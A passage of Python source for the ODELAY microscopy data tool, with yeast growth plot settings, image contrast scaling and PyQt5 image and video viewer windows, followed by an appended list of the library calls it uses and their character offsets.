plotRange['Yeast']['PopNum']['xRange'] = [0, 10000]
plotRange['Yeast']['PopNum']['xTicks'] = [10,100,1000]
plotRange['Yeast']['PopNum']['xStep'] = 10
plotRange['Yeast']['PopNum']['xLabel'] = 'log10 Pop'
plotRange['Yeast']['PopNum']['titleFrag'] = 'Pop Num'
plotRange['Yeast']['PopNum']['devisor'] = 1
if organism == None:
return plotRange
else:
return plotRange[organism]
def scaleImage(im, lowcut = 0.00001, highcut = 0.9995, scaleImage = 1):
# make a histogram of the image in the bitdept that the image was recorded.
imageHist = histogram1d(im.ravel(),2**16,[0,2**16],weights = None).astype('float')
# Calculate the cumulative probability ignoring zero values
cumHist = np.empty(imageHist.shape, dtype='float')
cumHist[0] = 0
cumHist[1:] = np.cumsum(imageHist[1:])
# if you expect a lot of zero set
cumRange = cumHist[2**16-1]-cumHist[0]
# if you expect a lot of zero set
cumHist-=cumHist[0]
cumHist /=cumRange
# set low and high values ot normalize image contrast.
loval = np.argmax(cumHist>=lowcut)
hival = np.argmax(cumHist>=highcut)
scIm = np.clip(im, loval, hival).astype('float')
# scale the image linearly over the range given. This does not set alpha values or whatever.
scaleFactor = 254/(hival-loval)
scIm -=loval
scIm *= scaleFactor
adjIm = np.require(scIm, dtype = 'uint8', requirements = 'C')
# resize if you need to
rsIm = cv2.resize(adjIm, (round(im.shape[1]/scaleImage), round(im.shape[0]/scaleImage)))
return rsIm
def parseVirts(x, y):
commands = {'M': (mpath.Path.MOVETO,),
'L': (mpath.Path.LINETO,),
'Q': (mpath.Path.CURVE3,)*2,
'C': (mpath.Path.CURVE4,)*3,
'Z': (mpath.Path.CLOSEPOLY,)}
rc = y.shape
vertices = np.zeros((rc[0]+3,2),dtype='float')
vertices[0,:] = [x[0],y[0]]
codes = []
codes.extend(commands['M'])
for n in range(1,rc[0]):
codes.extend(commands['L'])
vertices[n,:] = [x[n],y[n]]
vertices[-3,:] = [x[-1],0]
codes.extend(commands['L'])
vertices[-2,:] = [0,0]
codes.extend(commands['L'])
vertices[-2,:] = [0,0]
codes.extend(commands['Z'])
return codes, vertices
class OImageView(QtWidgets.QGraphicsView):
photoClicked = QtCore.pyqtSignal(QtCore.QPoint)
def __init__(self, parent):
super(OImageView, self).__init__(parent)
self._zoom = 0
self._empty = True
self._scene = QtWidgets.QGraphicsScene(self)
self._photo = QtWidgets.QGraphicsPixmapItem()
self.qImage = QImage()
self._scene.addItem(self._photo)
self.setScene(self._scene)
self.setTransformationAnchor(QtWidgets.QGraphicsView.AnchorUnderMouse)
self.setResizeAnchor(QtWidgets.QGraphicsView.AnchorUnderMouse)
self.setVerticalScrollBarPolicy(QtCore.Qt.ScrollBarAlwaysOff)
self.setHorizontalScrollBarPolicy(QtCore.Qt.ScrollBarAlwaysOff)
self.setBackgroundBrush(QtGui.QBrush(QtGui.QColor(30, 30, 30)))
self.setFrameShape(QtWidgets.QFrame.NoFrame)
def hasPhoto(self):
return not self._empty
def fitInView(self, scale=True):
rect = QtCore.QRectF(self._photo.pixmap().rect())
if not rect.isNull():
self.setSceneRect(rect)
if self.hasPhoto():
unity = self.transform().mapRect(QtCore.QRectF(0, 0, 1, 1))
self.scale(1 / unity.width(), 1 / unity.height())
viewrect = self.viewport().rect()
scenerect = self.transform().mapRect(rect)
factor = min(viewrect.width() / scenerect.width(),
viewrect.height() / scenerect.height())
self.scale(factor, factor)
self._zoom = 0
def setPhoto(self, pixmap=None, reset=True):
self._zoom = 0
if pixmap and not pixmap.isNull():
self._empty = False
self.setDragMode(QtWidgets.QGraphicsView.ScrollHandDrag)
self._photo.setPixmap(pixmap)
else:
self._empty = True
self.setDragMode(QtWidgets.QGraphicsView.NoDrag)
self._photo.setPixmap(QtGui.QPixmap())
if reset:
self.fitInView()
def wheelEvent(self, event):
if self.hasPhoto():
if event.angleDelta().y() > 0:
factor = 1.25
self._zoom += 1
else:
factor = 0.8
self._zoom -= 1
if self._zoom > 0:
self.scale(factor, factor)
elif self._zoom == 0:
self.fitInView()
else:
self._zoom = 0
def toggleDragMode(self):
if self.dragMode() == QtWidgets.QGraphicsView.ScrollHandDrag:
self.setDragMode(QtWidgets.QGraphicsView.NoDrag)
elif not self._photo.pixmap().isNull():
self.setDragMode(QtWidgets.QGraphicsView.ScrollHandDrag)
def mousePressEvent(self, event):
if self._photo.isUnderMouse():
self.photoClicked.emit(self.mapToScene(event.pos()).toPoint())
super(OImageView, self).mousePressEvent(event)
# Window is called to view window.
class ImageWindow(QtWidgets.QWidget):
'''
ImageWindow: a QWidget which holds the GraphicsView and button elements
'''
def __init__(self):
super(ImageWindow, self).__init__()
# Load experiment and odelayConfig data into Window data.
self.odelayConfig = fio.loadConfig()
self.experimentData = self.loadExperimentData()
self.roiList = [*self.experimentData['roiFiles']]
self.roiLbl = self.roiList[0]
self.numImages=len(self.experimentData['roiFiles'][self.roiLbl])
self.imageNumber = 1
#Create Photoviewer object
self.viewer = OImageView(self)
# 'Load image' button
self.selectRoi = QtWidgets.QComboBox(self)
qroiList = [self.tr(item) for item in self.roiList]
self.selectRoi.addItems(qroiList)
self.selectRoi.currentTextChanged.connect(self.chooseRoi)
#Button for load previous Image
self.btnPrevImage = QtWidgets.QToolButton(self)
self.btnPrevImage.setText('Prev')
self.btnPrevImage.setObjectName('btnPrevImage')
self.btnPrevImage.clicked.connect(self.changeImage)
#Button for load previous Image
self.btnNextImage = QtWidgets.QToolButton(self)
self.btnNextImage.setText('Next')
self.btnNextImage.setObjectName('btnNextImage')
self.btnNextImage.clicked.connect(self.changeImage)
#Button for load previous Image
self.btnSaveImage = QtWidgets.QToolButton(self)
self.btnSaveImage.setText('Save')
self.btnSaveImage.setObjectName('btnSaveImage')
self.btnSaveImage.clicked.connect(self.saveImage)
# Button to change from drag/pan to getting pixel info
self.btnPixInfo = QtWidgets.QToolButton(self)
self.btnPixInfo.setText('Enter pixel info mode')
self.btnPixInfo.clicked.connect(self.pixInfo)
self.editPixInfo = QtWidgets.QLineEdit(self)
self.editPixInfo.setReadOnly(True)
self.viewer.photoClicked.connect(self.photoClicked)
# Add Image time slider
self.imageSlider = QSlider(Qt.Horizontal)
self.imageSlider.setRange(1,self.numImages)
self.imageSlider.sliderReleased.connect(self.changeImage)
# Arrange layout
VBlayout = QtWidgets.QVBoxLayout(self)
VBlayout.addWidget(self.viewer)
VBlayout.addWidget(self.imageSlider)
HBlayout = QtWidgets.QHBoxLayout()
HBlayout.setAlignment(QtCore.Qt.AlignLeft)
HBlayout.addWidget(self.selectRoi)
HBlayout.addWidget(self.btnPrevImage)
HBlayout.addWidget(self.btnNextImage)
HBlayout.addWidget(self.btnSaveImage)
HBlayout.addWidget(self.btnPixInfo)
HBlayout.addWidget(self.editPixInfo)
VBlayout.addLayout(HBlayout)
def chooseRoi(self, ind):
self.roiLbl = ind
self.numImages = len(self.experimentData['roiFiles'][self.roiLbl])
if self.imageNumber>self.numImages:
self.imageNumber = self.numImages
self.imageSlider.setValue = self.numImages
self.loadImage()
def loadImage(self):
self.viewer.qImage = self.readImage()
pixmap = QPixmap.fromImage(self.viewer.qImage)
self.viewer.setPhoto(pixmap)
def saveImage(self):
location = self.odelayConfig['LocalDataDir']
options = QFileDialog.Options()
fileName, _ = QFileDialog.getSaveFileName(self,"Save Image", self.tr(location),"Images (*.png, *.jpg)", options=options)
print(fileName)
val = self.viewer.qImage.save(fileName, format=None, quality=100)
if val:
print('Image saved')
def changeImage(self):
sending_widget = self.sender()
if sending_widget.objectName() == self.btnNextImage.objectName():
self.imageNumber += 1
if self.imageNumber>self.numImages:
self.imageNumber = self.numImages
else:
self.viewer.qImage = self.readImage()
pixmap = QPixmap.fromImage(self.viewer.qImage)
self.imageSlider.setValue(self.imageNumber)
self.viewer.setPhoto(pixmap, False)
elif sending_widget.objectName() == self.btnPrevImage.objectName():
self.imageNumber -= 1
if self.imageNumber<1:
self.imageNumber = 1
else:
self.viewer.qImage = self.readImage()
pixmap = QPixmap.fromImage(self.viewer.qImage)
self.imageSlider.setValue(self.imageNumber)
self.viewer.setPhoto(pixmap, False)
elif sending_widget.objectName() == self.imageSlider.objectName():
self.imageNumber = sending_widget.value()
self.viewer.qImage = self.readImage()
pixmap = QPixmap.fromImage(self.viewer.qImage)
self.viewer.setPhoto(pixmap, False)
def pixInfo(self):
self.viewer.toggleDragMode()
def photoClicked(self, pos):
if self.viewer.dragMode() == QtWidgets.QGraphicsView.NoDrag:
self.editPixInfo.setText('%d, %d' % (pos.x(), pos.y()))
def openFileDialog():
options = QFileDialog.Options()
fileName, _ = QFileDialog.getOpenFileName(None,"Select ODELAY Data Set", "","ODELAYExpDisc (*Index_ODELAYData.mat);; Mat-Files (*.mat)", options=options)
return fileName
def loadExperimentData(self):
imagePath = pathlib.Path(self.odelayConfig['LocalImageDir'])
dataPath = pathlib.Path(self.odelayConfig['LocalDataDir'])
indexList = [k for k in dataPath.glob('*Index_ODELAYData.*')]
if len(indexList)==1:
expIndexPath = dataPath / indexList[0]
expData = fio.loadData(expIndexPath)
return expData
def readImage(self, lowcut = 0.0005, highcut = 0.99995):
roiLbl = self.roiLbl
imNum = self.imageNumber
imagePath = pathlib.Path(self.odelayConfig['LocalImageDir'])
dataPath = pathlib.Path(self.odelayConfig['LocalDataDir'])
# Generate image file Path by combining the region of interest lable with the experiment path
roiFolder = pathlib.Path('./'+ roiLbl)
imageFileName = pathlib.Path('./'+ roiLbl + '_'+ f'{imNum:00d}' + '.mat')
imageFilePath = imagePath / roiFolder / imageFileName
# Load Region of Interest Data. This HDF5 file should containt location of image stitch coordinates
roiPath = dataPath / 'ODELAY Roi Data' / f'{roiLbl}.hdf5'
roiData = fio.loadData(roiPath)
background = self.experimentData['backgroundImage']
# This data should be extracted from the Experiment Index file or stage data file.
pixSize = self.experimentData['pixSize']
magnification = self.experimentData['magnification']
stInd = f'{imNum-1:03d}'
stitchCorners = roiData['stitchMeta'][stInd]['imPix']
anImage = opl.assembleImage(imageFilePath, pixSize, magnification, background, stitchCorners)
im = anImage['Bf']
# make a histogram of the image in the bitdept that the image was recorded.
imageHist = histogram1d(im.ravel(),2**16,[0,2**16],weights = None).astype('float')
# Calculate the cumulative probability ignoring zero values
cumHist = np.zeros(imageHist.shape, dtype='float')
cumHist[1:] = np.cumsum(imageHist[1:])
# if you expect a lot of zero set
cumProb = (cumHist-cumHist[0])/(cumHist[2**16-1]-cumHist[0])
# set low and high values ot normalize image contrast.
loval = np.argmax(cumProb>=lowcut)
hival = np.argmax(cumProb>=highcut)
scIm = (im.astype('float') - loval.astype('float'))/(hival.astype('float') - loval.astype('float'))*254
lim = np.iinfo('uint8')
scIm = np.clip(scIm, lim.min, lim.max)
# Set image data type and make sure the array is contiguous in memory.
imageData = np.require(scIm, dtype = 'uint8', requirements = 'C')
# Set data as a QImage. This is a greyscale image
Qim = QImage(imageData.data, imageData.shape[1], imageData.shape[0], imageData.shape[1], QImage.Format_Grayscale8)
Qim.data = imageData
return Qim
class VideoWindow(QMainWindow):
def __init__(self, parent=None):
super(VideoWindow, self).__init__(parent)
self.setWindowTitle("PyQt Video Player Widget Example - pythonprogramminglanguage.com")
self.mediaPlayer = QMediaPlayer(None, QMediaPlayer.VideoSurface)
videoWidget = QVideoWidget()
self.playButton = QPushButton()
self.playButton.setEnabled(False)
self.playButton.setIcon(self.style().standardIcon(QStyle.SP_MediaPlay))
self.playButton.clicked.connect(self.play)
self.positionSlider = QSlider(Qt.Horizontal)
self.positionSlider.setRange(0, 0)
self.positionSlider.sliderReleased.connect(self.setPosition)
self.errorLabel = QLabel()
self.errorLabel.setSizePolicy(QSizePolicy.Preferred,
QSizePolicy.Maximum)
# Create new action
openAction = QAction(QIcon('open.png'), '&Open', self)
openAction.setShortcut('Ctrl+O')
openAction.setStatusTip('Open movie')
openAction.triggered.connect(self.openFile)
# Create exit action
exitAction = QAction(QIcon('exit.png'), '&Exit', self)
exitAction.setShortcut('Ctrl+Q')
exitAction.setStatusTip('Exit application')
exitAction.triggered.connect(self.exitCall)
# Create menu bar and add action
menuBar = self.menuBar()
fileMenu = menuBar.addMenu('&File')
#fileMenu.addAction(newAction)
fileMenu.addAction(openAction)
fileMenu.addAction(exitAction)
# Create a widget for window contents
wid = QWidget(self)
self.setCentralWidget(wid)
# Create layouts to place inside widget
controlLayout = QHBoxLayout()
controlLayout.setContentsMargins(0, 0, 0, 0)
controlLayout.addWidget(self.playButton)
controlLayout.addWidget(self.positionSlider)
layout = QVBoxLayout()
layout.addWidget(videoWidget)
layout.addLayout(controlLayout)
layout.addWidget(self.errorLabel)
# Set widget to contain window contents
wid.setLayout(layout)
self.mediaPlayer.setVideoOutput(videoWidget)
self.mediaPlayer.stateChanged.connect(self.mediaStateChanged)
self.mediaPlayer.positionChanged.connect(self.positionChanged)
self.mediaPlayer.durationChanged.connect(self.durationChanged)
self.mediaPlayer.error.connect(self.handleError)
def openFile(self):
odelayConfig = fio.loadConfig()
fileName, _ = QFileDialog.getOpenFileName(self, "Open Movie",
odelayConfig['LocalDataDir'])
if fileName != '':
self.mediaPlayer.setMedia(
QMediaContent(QUrl.fromLocalFile(fileName)))
self.playButton.setEnabled(True)
def exitCall(self):
sys.exit(app.exec_())
def play(self):
if self.mediaPlayer.state() == QMediaPlayer.PlayingState:
self.mediaPlayer.pause()
else:
self.mediaPlayer.play()
def mediaStateChanged(self, state):
if self.mediaPlayer.state() == QMediaPlayer.PlayingState:
self.playButton.setIcon(
self.style().standardIcon(QStyle.SP_MediaPause))
else:
self.playButton.setIcon(
self.style().standardIcon(QStyle.SP_MediaPlay))
def positionChanged(self, position):
self.positionSlider.setValue(position)
def durationChanged(self, duration):
self.positionSlider.setRange(0, duration)
def setPosition(self):
position = self.positionSlider.value()
self.mediaPlayer.setPosition(position)
def handleError(self):
self.playButton.setEnabled(False)
self.errorLabel.setText("Error: " + self.mediaPlayer.errorString())
def videoViewer():
app = QApplication(sys.argv)
player = VideoWindow()
player.resize(640, 480)
player.show()
sys.exit(app.exec_())
def imageViewer():
app = QtWidgets.QApplication(sys.argv)
window = ImageWindow()
window.setGeometry(500, 300, 800, 600)
window.show()
window.loadImage()
sys.exit(app.exec_())
def waveLengthToRGB(wl=650):
try:
wl=int(wl)
except:
wl=450
# print(wl)
if wl<380:
wl= 380
elif wl>780:
wl = 780
if wl>=380 and wl<=440:
R = np.abs((wl-440)/(440-380))
G = 0
B = 1
elif wl>440 and wl<=490:
R = 0
G = np.abs((wl-440)/(490-440))
B = 1
elif wl>490 and wl<=510:
R = 0
G = 1
B = np.abs((wl-510)/(510-490))
elif wl>510 and wl<=580:
R = np.abs((wl-510)/(580-510))
G = 1
B = 0;
elif wl>580 and wl<=645:
R = 1;
G = np.abs((wl-645)/(645-580))
B = 0
elif wl>645 and wl<=780:
R = 1
G = 0
B = 0
# LET THE INTENSITY SSS FALL OFF NEAR THE VISION LIMITS
if wl>700:
SSS=0.3+0.7* (780-wl)/(780-700)
elif wl<420:
SSS=.3+.7*(wl-380)/(420-380)
else:
SSS=1
r = np.round(SSS*R*255).astype('uint8')
g = np.round(SSS*G*255).astype('uint8')
b = np.round(SSS*B*255).astype('uint8')
return [r,g,b]
# class FocusPlot(QMainWindow):
# def __init__(self, parent=None):
# QMainWindow.__init__(self, parent)
# self.setWindowTitle('Demo: PyQt with matplotlib')
# self.create_menu()
# self.create_main_frame()
# self.create_status_bar()
# self.textbox.setText('1 2 3 4')
# self.on_draw()
# def save_plot(self):
# file_choices = "PNG (*.png)|*.png"
# path, ext = QFileDialog.getSaveFileName(self,
# 'Save file', '',
# file_choices)
# path = path.encode('utf-8')
# if not path[-4:] == file_choices[-4:].encode('utf-8'):
# path += file_choices[-4:].encode('utf-8')
# print(path)
# if path:
# self.canvas.print_figure(path.decode(), dpi=self.dpi)
# self.statusBar().showMessage('Saved to %s' % path, 2000)
# def on_about(self):
# msg = """ A demo of using PyQt with matplotlib:
# * Use the matplotlib navigation bar
# * Add values to the text box and press Enter (or click "Draw")
# * Show or hide the grid
# * Drag the slider to modify the width of the bars
# * Save the plot to a file using the File menu
# * Click on a bar to receive an informative message
# """
# QMessageBox.about(self, "About the demo", msg.strip())
# def on_pick(self, event):
# # The event received here is of the type
# # matplotlib.backend_bases.PickEvent
# #
# # It carries lots of information, of which we're using
# # only a small amount here.
# #
# box_points = event.artist.get_bbox().get_points()
# msg = "You've clicked on a bar with coords:\n %s" % box_points
# QMessageBox.information(self, "Click!", msg)
# def on_draw(self):
# """ Redraws the figure
# """
# str = self.textbox.text().encode('utf-8')
# self.data = [int(s) for s in str.split()]
# x = range(len(self.data))
# # clear the axes and redraw the plot anew
# #
# self.axes.clear()
# self.axes.grid(self.grid_cb.isChecked())
# self.axes.bar(
# x=x,
# height=self.data,
# width=self.slider.value() / 100.0,
# align='center',
# alpha=0.44,
# picker=5)
# self.canvas.draw()
# def create_main_frame(self):
# self.main_frame = QWidget()
# # Create the mpl Figure and FigCanvas objects.
# # 5x4 inches, 100 dots-per-inch
# #
# self.dpi = 100
# self.fig = Figure((5.0, 4.0), dpi=self.dpi)
# self.canvas = FigureCanvas(self.fig)
# self.canvas.setParent(self.main_frame)
# # Since we have only one plot, we can use add_axes
# # instead of add_subplot, but then the subplot
# # configuration tool in the navigation toolbar wouldn't
# # work.
# #
# self.axes = self.fig.add_subplot(111)
# # Bind the 'pick' event for clicking on one of the bars
# #
# self.canvas.mpl_connect('pick_event', self.on_pick)
# # Create the navigation toolbar, tied to the canvas
# #
# self.mpl_toolbar = NavigationToolbar(self.canvas, self.main_frame)
# # Other GUI controls
# #
# self.textbox = QLineEdit()
# self.textbox.setMinimumWidth(200)
# self.textbox.editingFinished.connect(self.on_draw)
# self.draw_button = QPushButton("&Draw")
# self.draw_button.clicked.connect(self.on_draw)
# self.grid_cb = QCheckBox("Show &Grid")
# self.grid_cb.setChecked(False)
# self.grid_cb.stateChanged.connect(self.on_draw)
# slider_label = QLabel('Bar width (%):')
# self.slider = QSlider(Qt.Horizontal)
# self.slider.setRange(1, 100)
# self.slider.setValue(20)
# self.slider.setTracking(True)
# self.slider.setTickPosition(QSlider.TicksBothSides)
# self.slider.valueChanged.connect(self.on_draw)
# #
# # Layout with box sizers
# #
# hbox = QHBoxLayout()
# for w in [ self.textbox, self.draw_button, self.grid_cb,
# slider_label, self.slider]:
# hbox.addWidget(w)
# hbox.setAlignment(w, Qt.AlignVCenter)
# vbox = QVBoxLayout()
# vbox.addWidget(self.canvas)
# vbox.addWidget(self.mpl_toolbar)
# vbox.addLayout(hbox)
# self.main_frame.setLayout(vbox)
# self.setCentralWidget(self.main_frame)
# def create_status_bar(self):
# self.status_text = QLabel("This is a demo")
# self.statusBar().addWidget(self.status_text, 1)
# def create_menu(self):
# self.file_menu = self.menuBar().addMenu("&File")
# load_file_action = self.create_action("&Save plot",
# shortcut="Ctrl+S", slot=self.save_plot,
# tip="Save the plot")
# quit_action = self.create_action("&Quit", slot=self.close,
# shortcut="Ctrl+Q", tip="Close the application")
# self.add_actions(self.file_menu,
# (load_file_action, None, quit_action))
# self.help_menu = self.menuBar().addMenu("&Help")
# about_action = self.create_action("&About",
# shortcut='F1', slot=self.on_about,
# tip='About the demo')
# self.add_actions(self.help_menu, (about_action,))
# def add_actions(self, target, actions):
# for action in actions:
# if action is None:
# target.addSeparator()
# else:
# target.addAction(action)
# def create_action( self, text, slot=None, shortcut=None,
# icon=None, tip=None, checkable=False):
# action = QAction(text, self)
# if icon is not None:
# action.setIcon(QIcon(":/%s.png" % icon))
# if shortcut is not None:
# action.setShortcut(shortcut)
# if tip is not None:
# action.setToolTip(tip)
# action.setStatusTip(tip)
# if slot is not None:
# action.triggered.connect(slot)
# if checkable:
# action.setCheckable(True)
# return action
# # def main():
# # app = QApplication(sys.argv)
# # form = AppForm()
# # form.show()
# # app.exec_()
# # if __name__ == "__main__":
# # main()
# class InteractiveGCPlot(QWidget)
|
[
"PyQt5.QtCore.pyqtSignal",
"numpy.sum",
"numpy.abs",
"numpy.argmax",
"matplotlib.pyplot.axes",
"numpy.empty",
"PyQt5.QtWidgets.QPushButton",
"PyQt5.QtGui.QColor",
"numpy.iinfo",
"numpy.clip",
"PyQt5.QtWidgets.QFileDialog.getOpenFileName",
"PyQt5.QtWidgets.QVBoxLayout",
"matplotlib.pyplot.figure",
"pathlib.Path",
"numpy.arange",
"PyQt5.QtCore.QRectF",
"PyQt5.QtWidgets.QSlider",
"PyQt5.QtWidgets.QApplication",
"PyQt5.QtWidgets.QGraphicsScene",
"cv2.imshow",
"numpy.round",
"PyQt5.QtWidgets.QLabel",
"PyQt5.QtGui.QPixmap.fromImage",
"PyQt5.QtWidgets.QWidget",
"PyQt5.QtWidgets.QToolButton",
"matplotlib.pyplot.close",
"numpy.require",
"numpy.cumsum",
"PyQt5.QtWidgets.QFileDialog.Options",
"numpy.max",
"tools.imagepl.assembleImage",
"numpy.linspace",
"PyQt5.QtWidgets.QGraphicsPixmapItem",
"matplotlib.patches.PathPatch",
"PyQt5.QtWidgets.QComboBox",
"matplotlib.pyplot.show",
"cv2.waitKey",
"numpy.log2",
"PyQt5.QtWidgets.QHBoxLayout",
"fast_histogram.histogram1d",
"PyQt5.QtGui.QImage",
"tools.imagepl.stitchImage",
"tools.fileio.loadConfig",
"PyQt5.QtGui.QPixmap",
"PyQt5.QtGui.QIcon",
"PyQt5.QtWidgets.QLineEdit",
"numpy.zeros",
"tools.fileio.loadData",
"matplotlib.path.Path",
"PyQt5.QtCore.QUrl.fromLocalFile",
"numpy.diff",
"numpy.array",
"cv2.destroyWindow",
"matplotlib.pyplot.savefig"
] |
[((1200, 1216), 'matplotlib.pyplot.close', 'plt.close', (['"""all"""'], {}), "('all')\n", (1209, 1216), True, 'import matplotlib.pyplot as plt\n'), ((2367, 2474), 'numpy.array', 'np.array', (['[[0, 0, 0, 0.3], [0, 0, 1, 1], [0, 0.7, 0, 1], [1, 0, 0, 1], [0.7, 0.5, 0, 1]]'], {'dtype': '"""float"""'}), "([[0, 0, 0, 0.3], [0, 0, 1, 1], [0, 0.7, 0, 1], [1, 0, 0, 1], [0.7,\n 0.5, 0, 1]], dtype='float')\n", (2375, 2474), True, 'import numpy as np\n'), ((2614, 2686), 'numpy.array', 'np.array', (['[rngTime, rngTdbl, rngTlag, rngTexp, rngNDub]'], {'dtype': '"""float64"""'}), "([rngTime, rngTdbl, rngTlag, rngTexp, rngNDub], dtype='float64')\n", (2622, 2686), True, 'import numpy as np\n'), ((2857, 2896), 'numpy.zeros', 'np.zeros', (['(5, numbins)'], {'dtype': '"""float64"""'}), "((5, numbins), dtype='float64')\n", (2865, 2896), True, 'import numpy as np\n'), ((2913, 2952), 'numpy.zeros', 'np.zeros', (['(5, numbins)'], {'dtype': '"""float64"""'}), "((5, numbins), dtype='float64')\n", (2921, 2952), True, 'import numpy as np\n'), ((2969, 3008), 'numpy.zeros', 'np.zeros', (['(5, numbins)'], {'dtype': '"""float64"""'}), "((5, numbins), dtype='float64')\n", (2977, 3008), True, 'import numpy as np\n'), ((3306, 3508), 'numpy.array', 'np.array', (['[[0.1875, 0.66666667, 0.75, 0.28], [0.1875, 0.48666667, 0.75, 0.1], [0.1875,\n 0.33333333, 0.75, 0.1], [0.1875, 0.19333333, 0.75, 0.1], [0.1875, \n 0.05333333, 0.75, 0.1]]'], {'dtype': '"""float64"""'}), "([[0.1875, 0.66666667, 0.75, 0.28], [0.1875, 0.48666667, 0.75, 0.1],\n [0.1875, 0.33333333, 0.75, 0.1], [0.1875, 0.19333333, 0.75, 0.1], [\n 0.1875, 0.05333333, 0.75, 0.1]], dtype='float64')\n", (3314, 3508), True, 'import numpy as np\n'), ((3616, 3688), 'numpy.array', 'np.array', (['[rngTime, rngTdbl, rngTlag, rngTexp, rngNDub]'], {'dtype': '"""float64"""'}), "([rngTime, rngTdbl, rngTlag, rngTexp, rngNDub], dtype='float64')\n", (3624, 3688), True, 'import numpy as np\n'), ((3789, 3857), 'numpy.array', 'np.array', (['[rngArea, [0, 1], [0, 1], [0, 1], [0, 1]]'], {'dtype': '"""float64"""'}), "([rngArea, [0, 1], [0, 1], [0, 1], [0, 1]], dtype='float64')\n", (3797, 3857), True, 'import numpy as np\n'), ((4417, 4469), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': '[4, 7.5]', 'dpi': '(100)', 'facecolor': '"""w"""'}), "(figsize=[4, 7.5], dpi=100, facecolor='w')\n", (4427, 4469), True, 'import matplotlib.pyplot as plt\n'), ((5375, 5391), 'matplotlib.pyplot.close', 'plt.close', (['"""all"""'], {}), "('all')\n", (5384, 5391), True, 'import matplotlib.pyplot as plt\n'), ((6331, 6405), 'numpy.array', 'np.array', (['[rngTdbl, rngTlag, rngTexp, rngNDub, rngPopNum]'], {'dtype': '"""float64"""'}), "([rngTdbl, rngTlag, rngTexp, rngNDub, rngPopNum], dtype='float64')\n", (6339, 6405), True, 'import numpy as np\n'), ((7626, 7664), 'numpy.zeros', 'np.zeros', (['(numRoi + 1, 2)'], {'dtype': '"""int"""'}), "((numRoi + 1, 2), dtype='int')\n", (7634, 7664), True, 'import numpy as np\n'), ((8643, 8674), 'numpy.zeros', 'np.zeros', (['(5, 4)'], {'dtype': '"""float"""'}), "((5, 4), dtype='float')\n", (8651, 8674), True, 'import numpy as np\n'), ((8784, 8834), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': '[7, 9]', 'dpi': '(100)', 'facecolor': '"""w"""'}), "(figsize=[7, 9], dpi=100, facecolor='w')\n", (8794, 8834), True, 'import matplotlib.pyplot as plt\n'), ((10231, 10257), 'numpy.arange', 'np.arange', (['poptot.shape[0]'], {}), '(poptot.shape[0])\n', (10240, 10257), True, 'import numpy as np\n'), ((10272, 10315), 'numpy.zeros', 'np.zeros', (['(poptot.shape[0],)'], {'dtype': '"""float"""'}), "((poptot.shape[0],), dtype='float')\n", (10280, 10315), True, 'import numpy as np\n'), ((10764, 10774), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (10772, 10774), True, 'import matplotlib.pyplot as plt\n'), ((10861, 10883), 'pathlib.Path', 'pathlib.Path', (['imageDir'], {}), '(imageDir)\n', (10873, 10883), False, 'import pathlib\n'), ((11071, 11098), 'pathlib.Path', 'pathlib.Path', (["('./' + roiLbl)"], {}), "('./' + roiLbl)\n", (11083, 11098), False, 'import pathlib\n'), ((11119, 11178), 'pathlib.Path', 'pathlib.Path', (["('./' + roiLbl + '_' + f'{imNum:00d}' + '.mat')"], {}), "('./' + roiLbl + '_' + f'{imNum:00d}' + '.mat')\n", (11131, 11178), False, 'import pathlib\n'), ((11364, 11385), 'pathlib.Path', 'pathlib.Path', (['dataDir'], {}), '(dataDir)\n', (11376, 11385), False, 'import pathlib\n'), ((11464, 11489), 'tools.fileio.loadData', 'fio.loadData', (['initPath[0]'], {}), '(initPath[0])\n', (11476, 11489), True, 'import tools.fileio as fio\n'), ((11640, 11706), 'tools.imagepl.stitchImage', 'opl.stitchImage', (['imageFilePath', 'pixSize', 'magnification', 'background'], {}), '(imageFilePath, pixSize, magnification, background)\n', (11655, 11706), True, 'import tools.imagepl as opl\n'), ((12029, 12049), 'numpy.cumsum', 'np.cumsum', (['imageHist'], {}), '(imageHist)\n', (12038, 12049), True, 'import numpy as np\n'), ((12205, 12231), 'numpy.argmax', 'np.argmax', (['(cumProb > 1e-05)'], {}), '(cumProb > 1e-05)\n', (12214, 12231), True, 'import numpy as np\n'), ((12245, 12273), 'numpy.argmax', 'np.argmax', (['(cumProb >= 0.9995)'], {}), '(cumProb >= 0.9995)\n', (12254, 12273), True, 'import numpy as np\n'), ((12492, 12525), 'cv2.imshow', 'cv2.imshow', (['"""Display Image"""', 'rsIm'], {}), "('Display Image', rsIm)\n", (12502, 12525), False, 'import cv2\n'), ((12535, 12549), 'cv2.waitKey', 'cv2.waitKey', (['(0)'], {}), '(0)\n', (12546, 12549), False, 'import cv2\n'), ((12794, 12816), 'pathlib.Path', 'pathlib.Path', (['imageDir'], {}), '(imageDir)\n', (12806, 12816), False, 'import pathlib\n'), ((12939, 12966), 'pathlib.Path', 'pathlib.Path', (["('./' + roiLbl)"], {}), "('./' + roiLbl)\n", (12951, 12966), False, 'import pathlib\n'), ((12987, 13046), 'pathlib.Path', 'pathlib.Path', (["('./' + roiLbl + '_' + f'{imNum:00d}' + '.mat')"], {}), "('./' + roiLbl + '_' + f'{imNum:00d}' + '.mat')\n", (12999, 13046), False, 'import pathlib\n'), ((13232, 13253), 'pathlib.Path', 'pathlib.Path', (['dataDir'], {}), '(dataDir)\n', (13244, 13253), False, 'import pathlib\n'), ((13332, 13357), 'tools.fileio.loadData', 'fio.loadData', (['initPath[0]'], {}), '(initPath[0])\n', (13344, 13357), True, 'import tools.fileio as fio\n'), ((13438, 13459), 'tools.fileio.loadData', 'fio.loadData', (['roiPath'], {}), '(roiPath)\n', (13450, 13459), True, 'import tools.fileio as fio\n'), ((13804, 13891), 'tools.imagepl.assembleImage', 'opl.assembleImage', (['imageFilePath', 'pixSize', 'magnification', 'background', 'stitchCorners'], {}), '(imageFilePath, pixSize, magnification, background,\n stitchCorners)\n', (13821, 13891), True, 'import tools.imagepl as opl\n'), ((14230, 14250), 'numpy.cumsum', 'np.cumsum', (['imageHist'], {}), '(imageHist)\n', (14239, 14250), True, 'import numpy as np\n'), ((14406, 14432), 'numpy.argmax', 'np.argmax', (['(cumProb > 1e-05)'], {}), '(cumProb > 1e-05)\n', (14415, 14432), True, 'import numpy as np\n'), ((14446, 14474), 'numpy.argmax', 'np.argmax', (['(cumProb >= 0.9995)'], {}), '(cumProb >= 0.9995)\n', (14455, 14474), True, 'import numpy as np\n'), ((14693, 14726), 'cv2.imshow', 'cv2.imshow', (['"""Display 